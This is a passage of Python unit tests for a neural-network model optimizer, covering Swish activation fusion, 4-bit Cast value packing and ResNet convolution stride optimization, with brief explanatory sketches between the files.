('beta', 'mul_beta', {'in': 1, 'out': 0}),
('mul_beta', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})]
def test_swish_with_sigmoid_with_beta_test(self):
graph = build_graph_with_edge_attrs(self.nodes, self.edges, {})
new_ref_nodes = ref_nodes.copy()
new_ref_nodes.update(**regular_op('beta', {'type': 'Parameter'}))
graph_ref = build_graph(new_ref_nodes, ref_edges + [('beta', 'swish')])
graph.stage = 'front'
SwishWithSigmoidWithBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
self.assertTrue(len(graph.get_op_nodes(name='final_mul')) == 1 and
graph.get_op_nodes(name='final_mul')[0].op == 'Swish')
def test_swish_with_sigmoid_with_beta_different_tensors(self):
graph = build_graph_with_edge_attrs({
**regular_op('input', {'type': 'Parameter'}),
**regular_op('input_2', {'type': 'Parameter'}),
**regular_op('beta', {'type': 'Parameter'}),
**regular_op('mul_beta', {'op': 'Mul'}),
**regular_op('sigmoid', {'op': 'Sigmoid'}),
**regular_op('mul_2', {'op': 'Mul', 'name': 'final_mul'}),
**result('result'),
}, [('input', 'mul_beta', {'in': 0, 'out': 0}),
('input_2', 'mul_2', {'in': 0, 'out': 0}),
('beta', 'mul_beta', {'in': 1, 'out': 0}),
('mul_beta', 'sigmoid', {'in': 0, 'out': 0}),
('sigmoid', 'mul_2', {'in': 1, 'out': 0}),
('mul_2', 'result', {'in': 0, 'out': 0})], {})
graph_ref = graph.copy()
graph.stage = 'front'
SwishWithSigmoidWithBeta().find_and_replace_pattern(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'result')
self.assertTrue(flag, resp)
```
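The two fusions tested above rely on Swish(x, beta) = x * sigmoid(beta * x), with beta defaulting to 1; a small NumPy sketch, with hypothetical values, of the subgraph each test builds and the fused op it expects:
```python
import numpy as np

def sigmoid(x):
    return 1.0 / (1.0 + np.exp(-x))

def swish(x, beta=1.0):                 # the single fused op the transforms produce
    return x * sigmoid(beta * x)

x, beta = np.random.randn(4), 1.7       # hypothetical input tensor and beta value

# Subgraph from SwishWithSigmoidWithoutBetaTest: input -> sigmoid -> mul
assert np.allclose(x * sigmoid(x), swish(x))

# Subgraph from SwishWithSigmoidWithBetaTest: input -> mul_beta -> sigmoid -> mul_2
assert np.allclose(x * sigmoid(x * beta), swish(x, beta))
```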
#### File: extensions/ops/cast_test.py
```python
import numpy as np
import unittest
from generator import generator, generate
from extensions.ops.Cast import Cast
from mo.middle.passes.convert_data_type import packed_U4, packed_I4
from mo.middle.passes.infer import partial_infer
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import valued_const_with_data, regular_op_with_empty_data, \
result, build_graph, connect
nodes = lambda value, dst_type: {
**valued_const_with_data('value', np.array(value)),
**regular_op_with_empty_data('convert', {'dst_type': dst_type, 'infer': Cast.infer}),
**result(),
}
@generator
class CastTest(unittest.TestCase):
"""
Example of checking:
7 == 0111, padded to 0111 0000, results in 112
7 == 0111, 8 == 1000 packed to 0111 1000, results in 120
-8 == 1000, padded to 1000 0000, results in 128
"""
@generate(*[
([0], [0], packed_U4),
([1], [16], packed_U4),
([2], [32], packed_U4),
([3], [48], packed_U4),
([4], [64], packed_U4),
([5], [80], packed_U4),
([6], [96], packed_U4),
([7], [112], packed_U4),
([8], [128], packed_U4),
([9], [144], packed_U4),
([10], [160], packed_U4),
([11], [176], packed_U4),
([12], [192], packed_U4),
([13], [208], packed_U4),
([14], [224], packed_U4),
([15], [240], packed_U4),
([0, 15], [15], packed_U4),
([1, 14], [30], packed_U4),
([2, 13], [45], packed_U4),
([3, 12], [60], packed_U4),
([4, 11], [75], packed_U4),
([5, 10], [90], packed_U4),
([6, 9], [105], packed_U4),
([7, 8], [120], packed_U4),
([8, 7], [135], packed_U4),
([9, 6], [150], packed_U4),
([10, 5], [165], packed_U4),
([11, 4], [180], packed_U4),
([12, 3], [195], packed_U4),
([13, 2], [210], packed_U4),
([14, 1], [225], packed_U4),
([15, 0], [240], packed_U4),
([-8], [128], packed_I4),
([-7], [144], packed_I4),
([-6], [160], packed_I4),
([-5], [176], packed_I4),
([-4], [192], packed_I4),
([-3], [208], packed_I4),
([-2], [224], packed_I4),
([-1], [240], packed_I4),
([0], [0], packed_I4),
([1], [16], packed_I4),
([2], [32], packed_I4),
([3], [48], packed_I4),
([4], [64], packed_I4),
([5], [80], packed_I4),
([6], [96], packed_I4),
([7], [112], packed_I4),
([-8, 7], [135], packed_I4),
([-7, 6], [150], packed_I4),
([-6, 5], [165], packed_I4),
([-5, 4], [180], packed_I4),
([-4, 3], [195], packed_I4),
([-3, 2], [210], packed_I4),
([-2, 1], [225], packed_I4),
([-1, 0], [240], packed_I4),
([0, -1], [15], packed_I4),
([1, -2], [30], packed_I4),
([2, -3], [45], packed_I4),
([3, -4], [60], packed_I4),
([4, -5], [75], packed_I4),
([5, -6], [90], packed_I4),
([6, -7], [105], packed_I4),
([7, -8], [120], packed_I4),
])
def test_custom_value_propagation(self, value, expected, custom_dtype):
graph = build_graph(nodes(value, custom_dtype), [
*connect('value', 'convert'), *connect('convert', 'output'),
])
partial_infer(graph)
graph_ref = build_graph(nodes(value, custom_dtype), [
*connect('value', 'convert'), *connect('convert', 'output')],
{'convert_d': {'force_type': custom_dtype, 'force_shape': np.array(value).shape,
'value': expected}})
(flag, resp) = compare_graphs(graph, graph_ref, 'output', check_op_attrs=True)
self.assertTrue(flag, resp)
```
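A short sketch of the nibble-packing arithmetic the docstring above walks through: the first value goes into the high nibble, the second into the low nibble, and negative I4 values are stored in two's complement:
```python
def pack_nibbles(first, second=0):
    """Pack two 4-bit values into one byte, first value in the high nibble."""
    return ((first & 0xF) << 4) | (second & 0xF)

assert pack_nibbles(7) == 112       # 0111 padded to 0111 0000
assert pack_nibbles(7, 8) == 120    # 0111 1000
assert pack_nibbles(-8) == 128      # 1000 padded to 1000 0000 (two's complement)
assert pack_nibbles(7, -8) == 120   # matches the ([7, -8], [120], packed_I4) case above
```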
#### File: passes/fusing/resnet_optimization_test.py
```python
import unittest
import numpy as np
from mo.front.common.partial_infer.elemental import copy_shape_infer
from mo.front.common.partial_infer.eltwise import eltwise_infer
from mo.middle.passes.fusing.resnet_optimization import stride_optimization
from mo.ops.convolution import Convolution
from mo.ops.pooling import Pooling
from mo.utils.ir_engine.compare_graphs import compare_graphs
from mo.utils.unittest.graph import build_graph
max_elt_lambda = lambda node: eltwise_infer(node, lambda a, b: np.maximum(a, b))
nodes_attributes = {
# Placeholders
'placeholder_1': {'shape': None, 'type': 'Parameter', 'kind': 'op', 'op': 'Parameter'},
'placeholder_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
# Concat1 operation
'eltwise_1': {'type': 'Maximum', 'kind': 'op', 'op': 'Maximum', 'infer': max_elt_lambda},
'eltwise_1_data': {'name': 'eltwise_1_data', 'value': None, 'shape': None, 'kind': 'data'},
# Convolutions
'conv_1': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_1_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_1_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_1_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_2': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_2_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_2_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_2_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_3': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_3_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_3_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_3_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_4': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_4_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_4_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_4_data': {'value': None, 'shape': None, 'kind': 'data'},
'conv_5': {'type': 'Convolution', 'kind': 'op', 'op': 'Conv2D', 'layout': 'NCHW',
'output_spatial_shape': None, 'output_shape': None, 'bias_term': True, 'group': 1,
'spatial_dims': np.array([2, 3]),
'channel_dims': np.array([1]), 'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'dilation': np.array([1, 1, 1, 1]),
'batch_dims': np.array([0]), 'infer': Convolution.infer,
'kernel_spatial_idx': np.array([2, 3], dtype=np.int64), 'input_feature_channel': 1,
'output_feature_channel': 0, },
'conv_5_w': {'value': None, 'shape': None, 'kind': 'data',
'dim_attrs': ['spatial_dims', 'channel_dims', 'batch_dims', 'axis']},
'conv_5_b': {'value': None, 'shape': None, 'kind': 'data'},
'conv_5_data': {'value': None, 'shape': None, 'kind': 'data'},
# ReLU
'relu_1': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_1_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
'relu_2': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_2_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
'relu_3': {'shape': None, 'type': 'ReLU', 'kind': 'op', 'op': 'ReLU', 'infer': copy_shape_infer},
'relu_3_data': {'value': None, 'shape': None, 'kind': 'data', 'data_type': None},
# Pooling
'pool_1': {'type': 'Pooling', 'kind': 'op', 'op': 'Pooling',
'spatial_dims': np.array([2, 3]),
'pad_spatial_shape': np.array([[0, 0], [0, 0]]),
'infer': Pooling.infer},
'pool_1_data': {'value': None, 'shape': None, 'kind': 'data'},
}
# The unit test descriptions below use the following syntax: Operation(NxM,XxY), where NxM is the kernel size and XxY is the stride
class ResnetOptimizationTests(unittest.TestCase):
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2) => Pl->Conv(1x1,2x2)->Conv(1x1,1x1)
def test_resnet_optimization_1(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(1x1,2x2) => Pl->Conv(3x3,4x4)->Conv(1x1,1x1)
def test_resnet_optimization_2(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(3x3,2x2)->Conv(3x3,2x2) => Same
def test_resnet_optimization_3(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_2_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl--->Conv(3x3,2x2)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(3x3,4x4)->ReLU--->Eltwise-->Conv(1x1,1x1)
# `-->Conv(3x3,2x2)->ReLU---` `-->Conv(3x3,4x4)->ReLU---`
def test_resnet_optimization_4(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_1': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 56, 56])},
'relu_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_2_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_2': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 4, 4]),
'output': np.array([3])},
'conv_2_data': {'shape': np.array([1, 3, 56, 56])},
'relu_2_data': {'shape': np.array([1, 3, 56, 56])},
'eltwise_1_data': {'shape': np.array([1, 3, 56, 56])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 56, 56])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
# dump_graph_for_graphviz(graph)
# dump_graph_for_graphviz(graph_ref)
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl--->Conv(1x1,1x1)->ReLU--->Eltwise-->Conv(1x1,2x2) => Pl--->Conv(1x1,2x2)->ReLU--->Eltwise-->Conv(1x1,1x1)
# `----------------->ReLU---` `-->Pool(1x1,2x2)->ReLU---`
def test_resnet_optimization_5(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'relu_1_data': {'shape': np.array([1, 3, 224, 224])},
'relu_2_data': {'shape': np.array([1, 3, 224, 224])},
'eltwise_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'relu_1'),
('relu_1', 'relu_1_data'),
('placeholder_1_data', 'pool_1'),
('pool_1', 'pool_1_data'),
('pool_1_data', 'relu_2'),
('relu_2', 'relu_2_data'),
('relu_1_data', 'eltwise_1'),
('relu_2_data', 'eltwise_1'),
('eltwise_1', 'eltwise_1_data'),
('eltwise_1_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3])},
'conv_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_1_data': {'shape': np.array([1, 3, 112, 112])},
'pool_1': {'stride': np.array([1, 1, 2, 2])},
'pool_1_data': {'shape': np.array([1, 3, 112, 112])},
'relu_2_data': {'shape': np.array([1, 3, 112, 112])},
'eltwise_1_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_3': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3])},
'conv_3_data': {'shape': np.array([1, 3, 112, 112])},
},
nodes_with_edges_only=True)
graph.graph['layout'] = 'NCHW'
graph_ref.graph['layout'] = 'NCHW'
# dump_graph_for_graphviz(graph)
# dump_graph_for_graphviz(graph_ref)
stride_optimization(graph)
(flag, resp) = compare_graphs(graph, graph_ref, 'conv_3_data', check_op_attrs=True)
self.assertTrue(flag, resp)
# Pl->Conv(1x1,1x1)->Conv(1x1,2x2)->Conv(3x3,1x1)->Conv(1x1,2x2)
# =>
# Pl->Conv(1x1,2x2)->Conv(1x1,1x1)->Conv(3x3,2x2)->Conv(1x1,1x1)
def test_resnet_optimization_6(self):
graph = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'conv_3'),
('conv_3_w', 'conv_3'),
('conv_3_b', 'conv_3'),
('conv_3', 'conv_3_data'),
('conv_3_data', 'conv_4'),
('conv_4_w', 'conv_4'),
('conv_4_b', 'conv_4'),
('conv_4', 'conv_4_data'),
],
{'placeholder_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_1_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_1': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_1_data': {'shape': np.array([1, 3, 224, 224])},
'conv_2_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_2': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_2_data': {'shape': np.array([1, 3, 112, 112])},
'conv_3_w': {'value': np.zeros([3, 3, 3, 3]), 'shape': np.array([3, 3, 3, 3])},
'conv_3': {'kernel_spatial': np.array([3, 3]),
'stride': np.array([1, 1, 1, 1]),
'output': np.array([3]), },
'conv_3_data': {'shape': np.array([1, 3, 110, 110])},
'conv_4_w': {'value': np.zeros([3, 3, 1, 1]), 'shape': np.array([3, 3, 1, 1])},
'conv_4': {'kernel_spatial': np.array([1, 1]),
'stride': np.array([1, 1, 2, 2]),
'output': np.array([3]), },
'conv_4_data': {'shape': np.array([1, 3, 55, 55])},
},
nodes_with_edges_only=True)
graph_ref = build_graph(nodes_attributes,
[('placeholder_1', 'placeholder_1_data'),
('placeholder_1_data', 'conv_1'),
('conv_1_w', 'conv_1'),
('conv_1_b', 'conv_1'),
('conv_1', 'conv_1_data'),
('conv_1_data', 'conv_2'),
('conv_2_w', 'conv_2'),
('conv_2_b', 'conv_2'),
('conv_2', 'conv_2_data'),
('conv_2_data', 'conv_3'),
('conv_3_w', 'conv_3'),
